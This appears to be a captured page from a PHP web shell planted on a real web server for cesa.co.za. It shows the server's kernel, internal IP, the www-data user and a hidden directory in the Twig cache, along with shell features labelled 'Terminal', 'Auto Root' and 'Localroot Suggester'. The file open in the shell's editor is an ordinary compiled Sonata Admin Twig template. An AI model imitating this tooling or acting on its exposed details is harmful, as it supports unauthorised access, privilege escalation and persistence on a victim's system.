Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
var /
cache /
.!!QgY /
twig /
79 /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
795a07e4e6d23b2959f8ff4beb30e527.php
8.25
KB
-rwxrwxr-x
2026-05-18 12:54
799ee1ea5e10b33580a3ebdad561f922.php
3.81
KB
-rwxrwxr-x
2026-05-18 12:54
Save
Rename
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\CoreExtension; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; use Twig\TemplateWrapper; /* @SonataAdmin/CRUD/display_url.html.twig */ class __TwigTemplate_68d9fe5faa1eb5b4782af2709a5feec6 extends Template { private Source $source; /** * @var array<string, Template> */ private array $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->parent = false; $this->blocks = [ ]; } protected function doDisplay(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 12 $_v0 = ('' === $tmp = \Twig\Extension\CoreExtension::captureOutput((function () use (&$context, $macros, $blocks) { // line 13 yield " "; if (Twig\Extension\CoreExtension::testEmpty(($context["value"] ?? null))) { // line 14 yield " "; } else { // line 16 yield " "; if ((($tmp = ((array_key_exists("url", $context)) ? (Twig\Extension\CoreExtension::default(($context["url"] ?? null), null)) : (null))) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { // line 17 yield " "; // line 18 yield " "; $context["url_address"] = ($context["url"] ?? null); // line 19 yield " "; } elseif (( !(null === ((array_key_exists("route", $context)) ? (Twig\Extension\CoreExtension::default(($context["route"] ?? null), null)) : (null))) && !CoreExtension::inFilter(CoreExtension::getAttribute($this->env, $this->source, ($context["route"] ?? null), "name", [], "any", false, false, false, 19), ["edit", "show"]))) { // line 20 yield " "; // line 21 yield " "; $context["parameters"] = ((CoreExtension::getAttribute($this->env, $this->source, ($context["route"] ?? null), "parameters", [], "any", true, true, false, 21)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["route"] ?? null), "parameters", [], "any", false, false, false, 21), [])) : ([])); // line 22 yield " "; // line 23 if ((($tmp = ((CoreExtension::getAttribute($this->env, $this->source, ($context["route"] ?? null), "absolute", [], "any", true, true, false, 23)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["route"] ?? null), "absolute", [], "any", false, false, false, 23), false)) : (false))) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { // line 24 yield " "; $context["url_address"] = $this->extensions['Symfony\Bridge\Twig\Extension\RoutingExtension']->getUrl(CoreExtension::getAttribute($this->env, $this->source, ($context["route"] ?? null), "name", [], "any", false, false, false, 24), ($context["parameters"] ?? null)); // line 25 yield " "; } else { // line 26 yield " "; $context["url_address"] = $this->extensions['Symfony\Bridge\Twig\Extension\RoutingExtension']->getPath(CoreExtension::getAttribute($this->env, $this->source, ($context["route"] ?? null), "name", [], "any", false, false, false, 26), ($context["parameters"] ?? null)); // line 27 yield " "; } // line 28 yield " "; } else { // line 29 yield " "; // line 30 yield " "; $context["url_address"] = ($context["value"] ?? null); // line 31 yield " "; } // line 32 yield " "; // line 33 if ((($tmp = ((array_key_exists("hide_protocol", $context)) ? (Twig\Extension\CoreExtension::default(($context["hide_protocol"] ?? null), false)) : (false))) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { // line 34 yield " "; $context["value"] = Twig\Extension\CoreExtension::replace(($context["value"] ?? null), ["http://" => "", "https://" => ""]); // line 35 yield " "; } // line 36 yield " <a href=\""; // line 38 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(($context["url_address"] ?? null), "html", null, true); yield "\""; // line 39 $context['_parent'] = $context; $context['_seq'] = CoreExtension::ensureTraversable(((array_key_exists("attributes", $context)) ? (Twig\Extension\CoreExtension::default(($context["attributes"] ?? null), [])) : ([]))); foreach ($context['_seq'] as $context["attribute"] => $context["value"]) { // line 40 yield " "; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($context["attribute"], "html", null, true); yield "=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($context["value"], "html_attr"); yield "\""; } $_parent = $context['_parent']; unset($context['_seq'], $context['attribute'], $context['value'], $context['_parent']); $context = array_intersect_key($context, $_parent) + $_parent; // line 42 yield ">"; // line 43 if ((($tmp = ((array_key_exists("safe", $context)) ? (Twig\Extension\CoreExtension::default(($context["safe"] ?? null), false)) : (false))) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { // line 44 yield ($context["value"] ?? null); } else { // line 46 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(($context["value"] ?? null), "html", null, true); } // line 48 yield "</a> "; } yield from []; })())) ? '' : new Markup($tmp, $this->env->getCharset()); // line 12 yield Twig\Extension\CoreExtension::trim($_v0); yield from []; } /** * @codeCoverageIgnore */ public function getTemplateName(): string { return "@SonataAdmin/CRUD/display_url.html.twig"; } /** * @codeCoverageIgnore */ public function isTraitable(): bool { return false; } /** * @codeCoverageIgnore */ public function getDebugInfo(): array { return array ( 143 => 12, 137 => 48, 134 => 46, 131 => 44, 129 => 43, 127 => 42, 117 => 40, 113 => 39, 110 => 38, 106 => 36, 103 => 35, 100 => 34, 98 => 33, 95 => 32, 92 => 31, 89 => 30, 87 => 29, 84 => 28, 81 => 27, 78 => 26, 75 => 25, 72 => 24, 70 => 23, 67 => 22, 64 => 21, 62 => 20, 59 => 19, 56 => 18, 54 => 17, 51 => 16, 47 => 14, 44 => 13, 42 => 12,); } public function getSourceContext(): Source { return new Source("", "@SonataAdmin/CRUD/display_url.html.twig", "/var/www/v3.cesa.co.za/vendor/sonata-project/admin-bundle/src/Resources/views/CRUD/display_url.html.twig"); } }